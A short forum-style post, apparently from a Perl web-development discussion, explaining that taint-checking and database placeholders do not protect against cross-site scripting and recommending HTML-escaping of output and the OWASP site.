Taint-checking and placeholders help protect the server against clients trying to perform actions they're not authorized for. They don't help at all against "cross-site scripting" (where one client uses the server to attack other clients).

Cross-site scripting attacks are dangerous because they can trick legitimate users/clients into performing actions they do have authority for, but don't want to do.

So you still need to worry about anything that can influence the client - like html/javascript in input etc. Usually, like quoting with DBI, HTML-escaping all output should go some way, but there are more complex issues.

http://www.owasp.org/ is a good resource if you're serious about web security.